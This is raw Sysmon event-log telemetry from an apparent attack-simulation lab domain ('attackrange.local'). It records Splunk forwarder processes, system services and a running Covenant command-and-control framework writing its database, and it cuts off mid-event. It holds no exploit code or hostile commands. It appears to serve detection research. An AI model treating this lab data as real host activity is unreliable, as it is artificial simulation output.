10341000x8000000000000000149955Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149954Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149953Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149952Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70A5-60CA-0C0D-00000000D101}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149951Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.901{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A5-60CA-0C0D-00000000D101}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149950Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.734{39BD8DE3-70A5-60CA-0C0D-00000000D101}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149949Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.844{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9698877E000AB45052D1DC5A63C92122,SHA256=F16AD1B69704DA59762C4BFD9C33D83C3DF67A2764DE0D582FF32FD1510FE6FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149948Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:05.460{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5FC267CF13D03FBAACCFFC5DCAA0862,SHA256=BA5DB4CFD132BE83EE1D44016A2B46CCC8AFC8176779F4F84845F31B4798CA76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149947Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:04.995{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A4-60CA-0B0D-00000000D101}3356C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104610Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:06.948{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E5353D121233F1771BCFDEE09CCD824C,SHA256=16B15BC1224FCEF35B76CDC832B01C3D2C19E2639BDC80D99F60822A89E0C151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104609Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:06.498{54715871-FD18-60C9-1000-00000000CF01}380NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=10153771F458DE19C60802537D0FF940,SHA256=B63A386C92709CB9C84AE987C8FE25A1222B93EA298A71F528892DD9F31259B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104608Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:06.270{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2A10D090F2AD39B5A3E79DDACD5D8C,SHA256=7594118D7CA6A4397A9BF93519B8D7B5A46172824D3737D6450FF49A07E23755,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149968Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.762{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A6-60CA-0D0D-00000000D101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149967Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.759{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149966Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.759{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149965Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.758{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149964Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.758{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149963Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.758{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70A6-60CA-0D0D-00000000D101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149962Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.758{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A6-60CA-0D0D-00000000D101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000149961Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.628{39BD8DE3-70A6-60CA-0D0D-00000000D101}1320C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000149960Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.464{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3E8412FACEB362FE7756F1D68D8B27E,SHA256=C85C44BBF7A662AAF432743A537F10EEB271AC01A5DB7A222FDB7CDD1DD6AAAC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149959Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.346{39BD8DE3-70A5-60CA-0C0D-00000000D101}55525968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{39BD8DE3-480D-60CA-F607-00000000D101}5112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149958Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:06.284{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808C:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104611Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:44:07.634{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E02BE8103BB77203C87008C74E01E99,SHA256=45DECE9F135DC4F4B1DD61DBA01F6029C2B0A992556617A69CE9AAD10CC85C20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149988Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.995{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149987Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.986{39BD8DE3-70A0-60CA-0A0D-00000000D101}5808WIN-HOST-14\AdministratorC:\Users\Administrator\Covenant\Covenant\bin\Debug\netcoreapp3.1\Covenant.exeC:\Users\Administrator\Covenant\Covenant\Data\covenant.db-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149986Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.985{39BD8DE3-480E-60CA-FA07-00000000D101}71324084C:\Windows\system32\conhost.exe{39BD8DE3-70A7-60CA-0E0D-00000000D101}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149985Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.979{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149984Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.978{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149983Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.978{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-70A7-60CA-0E0D-00000000D101}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000149982Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.978{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149981Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.978{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149980Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:44:07.978{39BD8DE3-480D-60CA-F607-00000000D101}51125172C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{39BD8DE3-70A7-60CA-0E0D-00000000D101}6748C:\Program 